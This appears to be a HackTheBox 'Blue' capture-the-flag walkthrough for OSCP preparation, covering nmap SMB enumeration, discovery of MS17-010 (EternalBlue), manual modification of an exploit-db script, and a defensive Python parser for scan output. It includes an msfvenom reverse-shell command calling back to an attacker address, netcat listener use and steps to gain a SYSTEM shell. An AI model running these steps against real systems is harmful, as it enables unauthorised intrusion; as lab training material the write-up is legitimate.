HackTheBox — Blue (w/o Metasploit)
Here’s a fun and quick Windows challenge to practice on. If you’re using Metasploit, it’ll likely take more time to scan with nmap, load Metasploit, and run the exploit than it will to figure out what needs to be done. But as with the majority of my HTB walkthroughs, I’m going to be doing this one without the use of Metasploit for those who are reading this for OSCP preparation.
Enumeration
We start by scanning this machine with the following nmap command:
nmap -n -sS -sV -O -A -T4 10.10.10.40
This runs a TCP SYN scan (-sS) with the aggressive timing template (-T4), identifies the version of each service (-sV), performs OS detection (-O) and enables the aggressive scan options such as script scanning and traceroute (-A), while skipping DNS resolution (-n). Below are the results of this scan; the parts to pay attention to are the SMB service on port 445, the Windows 7 Service Pack 1 version string and the smb-security-mode results.
root@kali:~# nmap -n -sS -sV -O -A -T4 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 22:24 EDT
Nmap scan report for 10.10.10.40
Host is up (0.091s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/8%OT=135%CT=1%CU=32883%PV=Y%DS=2%DC=T%G=Y%TM...
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -13m22s, deviation: 34m36s, median: 6m35s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-10-09T03:32:48+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-09T02:32:45
|_ start_date: 2020-10-09T02:04:43
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 115.53 ms 10.10.14.1
2 115.61 ms 10.10.10.40
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.02 seconds
Based on these results, we can see that the machine is running Windows 7 Professional 7601 Service Pack 1 with SMB exposed, guest logon permitted and SMB message signing not required.
We can enumerate further by using a few nmap scripts. One way to see what scripts are available is to use the following command:
cat /usr/share/nmap/scripts/script.db | grep smb
This will give you a list of scripts along with their categories. To clean it up a bit, we can add a cut to the command:
cat /usr/share/nmap/scripts/script.db | grep smb | cut -d'"' -f2
This returns a list of the available SMB-related nmap scripts. The ones we’ll be using are the smb-enum-* and smb-vuln-* scripts.
smb-brute.nse
smb-double-pulsar-backdoor.nse
smb-enum-domains.nse
smb-enum-groups.nse
smb-enum-processes.nse
smb-enum-services.nse
smb-enum-sessions.nse
smb-enum-shares.nse
smb-enum-users.nse
smb-flood.nse
smb-ls.nse
smb-mbenum.nse
smb-os-discovery.nse
smb-print-text.nse
smb-protocols.nse
smb-psexec.nse
smb-security-mode.nse
smb-server-stats.nse
smb-system-info.nse
smb-vuln-conficker.nse
smb-vuln-cve-2017-7494.nse
smb-vuln-cve2009-3103.nse
smb-vuln-ms06-025.nse
smb-vuln-ms07-029.nse
smb-vuln-ms08-067.nse
smb-vuln-ms10-054.nse
smb-vuln-ms10-061.nse
smb-vuln-ms17-010.nse
smb-vuln-regsvc-dos.nse
smb-vuln-webexec.nse
smb-webexec-exploit.nse
smb2-capabilities.nse
smb2-security-mode.nse
smb2-time.nse
smb2-vuln-uptime.nse
Back to enumerating SMB. We can use some of the scripts listed above to enumerate further and to scan for vulnerabilities. The following command runs every smb-enum-* script from that list against the SMB ports:
sudo nmap -p139,445 --script=smb-enum-* 10.10.10.40
This provides some interesting information to note for later: guest access is used, and the Share and Users shares are readable by that account.
root@kali:~# nmap -p139,445 --script=smb-enum-* 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 22:03 EDT
Nmap scan report for 10.10.10.40
Host is up (0.085s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
|_smb-enum-domains: ERROR: Script execution failed (use -d to debug)
|_smb-enum-groups: ERROR: Script execution failed (use -d to debug)
| smb-enum-shares:
| account_used: guest
| \\10.10.10.40\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.40\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.40\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: READ
| Current user access: READ/WRITE
| \\10.10.10.40\Share:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
| Current user access: READ
| \\10.10.10.40\Users:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
|_ Current user access: READ
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 55.84 seconds
Next, let’s run the vulnerability scanning scripts using this command:
nmap -p139,445 --script=smb-vuln-* 10.10.10.40
Below are the results from this scan.
root@kali:~# nmap -p139,445 --script=smb-vuln-* 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 22:11 EDT
Nmap scan report for 10.10.10.40
Host is up (0.083s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 14.83 seconds
Perfect! The results from our nmap vulnerability scan show that this server is vulnerable to MS17-010, a.k.a. EternalBlue (which explains the name of this challenge). Now, we could always use Metasploit and run the windows/smb/ms17_010_eternalblue exploit for this. But let’s try this manually instead.
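As an added example that is not part of the original walkthrough, here is a small triage parser for nmap's SMB host-script output in the format shown above. It pulls out the findings a defender or assessor would record from a scan like this: the OS version, whether SMB message signing is enforced, whether guest access worked, and which smb-vuln-* scripts reported VULNERABLE along with their CVE IDs. The sample scan text is constructed to mirror the results above.

```python
import re

# Constructed sample, modelled on the nmap host-script output shown above.
SAMPLE_SCAN = """\
Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   Computer name: haris-PC
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
"""


def triage_smb_scan(text):
    """Return defender-relevant findings parsed from nmap SMB script output."""
    findings = {"os": None, "signing": {}, "guest_access": False, "vulnerable": {}}
    script = None  # name of the NSE script whose block we are currently inside
    for raw in text.splitlines():
        line = raw.lstrip("|_ ").rstrip()  # drop nmap's tree prefix
        head = re.match(r"(smb2?-[a-z0-9-]+):\s*(.*)", line)
        if head:  # a new script block starts (one-line results carry their value)
            script, line = head.group(1), head.group(2)
        if script == "smb-os-discovery" and line.startswith("OS:"):
            findings["os"] = line[3:].strip()
        elif script == "smb-security-mode":
            if line.startswith("account_used:"):
                findings["guest_access"] = line.split(":", 1)[1].strip() == "guest"
            elif line.startswith("message_signing:"):
                findings["signing"]["smb1"] = line.split(":", 1)[1].strip()
        elif script == "smb2-security-mode" and "signing" in line.lower():
            findings["signing"]["smb2"] = line
        elif script and script.startswith("smb-vuln-"):
            if line.startswith("State:") and "VULNERABLE" in line:
                findings["vulnerable"].setdefault(script, [])
            cves = re.findall(r"CVE-\d{4}-\d+", line)
            if cves and script in findings["vulnerable"]:
                findings["vulnerable"][script].extend(cves)
    return findings


if __name__ == "__main__":
    print(triage_smb_scan(SAMPLE_SCAN))
```

Feed it the saved output of `nmap -p139,445 --script=smb-vuln-* --script=smb-security-mode,smb-os-discovery` (or the `-oN` file) and the returned dict gives you a ticket-ready summary: an unpatched MS17-010 host with signing disabled is exactly the combination that should trigger an immediate patch and SMBv1 removal.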
Exploitation
Let’s start by looking for an exploit. We can check exploitdb for an appropriate exploit by running searchsploit ms17-010.
According to our initial nmap scan, this machine is running Windows 7 Professional 7601 Service Pack 1. Looking at our searchsploit results, 42315.py looks like our best match. The script isn't ready to run out of the box, however; we'll need to make a few changes. It’s important to analyze any exploit code before using it, for two reasons. First, you want to make sure it’s reliable and trustworthy. Second, you need to understand how it works in case you have to modify it for your specific use.
Before we start, copy the python file to your working directory so that you’re not modifying the original. Open it up in a text editor of your choice and change the USERNAME value to // since guest logon is allowed (seen in our nmap scans from earlier).
Next, let’s look at the payload section.
Right now, this script will only create a text file named pwned.txt on the C: drive of the victim's computer. We'll need to modify this part to transfer our own payload. We can transfer and execute a variety of payloads on this machine, but right now we're only interested in getting a reverse shell. To do this, let’s generate a reverse shell payload using msfvenom. For those who are reading this in preparation for the OSCP, at the time that I'm writing this, using msfvenom to create payloads is perfectly acceptable as long as your payload doesn't open a meterpreter session.
To create a reverse shell payload, we can use the following msfvenom command (replacing LHOST with your own IP address):
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=443 -f exe > binary.exe
Now that we have our payload, let's modify the exploit code to transfer our binary.exe file and run it on the victim's machine.
Be sure to replace the file path seen above (/root/Document/htb/blue/) with the path to the payload you just generated. Before running the script, remember to open a netcat listener on port 443 (or whatever you put as your LPORT value when generating your msfvenom payload).
Now to run the script. You can run it using the following line:
python 42315.py 10.10.10.40
By the way, if you receive an error saying “No module named mysmb”, copy this into the same directory as your exploit: https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
I had to try running this exploit several times for it to work. Try it 5 or 6 times waiting a few seconds in between and check your netcat listener to see what happens. After a few repeated runs, I saw that sweet sweet response that makes everything better:
User and Root Flags
Now that we have a SYSTEM-level shell and don't need to worry about privilege escalation, let's grab the flags. Checking the C:\Users directory, we see only haris and Administrator.
The flags for HTB Windows machines are located in each user's Desktop directory. To read the user flag, we'll check C:\Users\haris\Desktop\user.txt.
And finally, we'll check C:\Users\Administrator\Desktop\root.txt for the root flag.
Final Thoughts
If you’re relatively new to CTFs and wargames, this is a great machine to play with and see EternalBlue in action. I highly recommend familiarizing yourself with MS17-010, as you’ll likely see this one more often than you’d expect. It’s also a good idea to learn how to use it manually. As is the case with most exploits, learning how to exploit EternalBlue via Metasploit isn’t much of a challenge in my opinion. It’s definitely faster, but it doesn’t teach much. Understanding the details of how an exploit works and how you can customize it to your advantage is a much better investment of time. I hope you enjoyed this walkthrough. Good luck!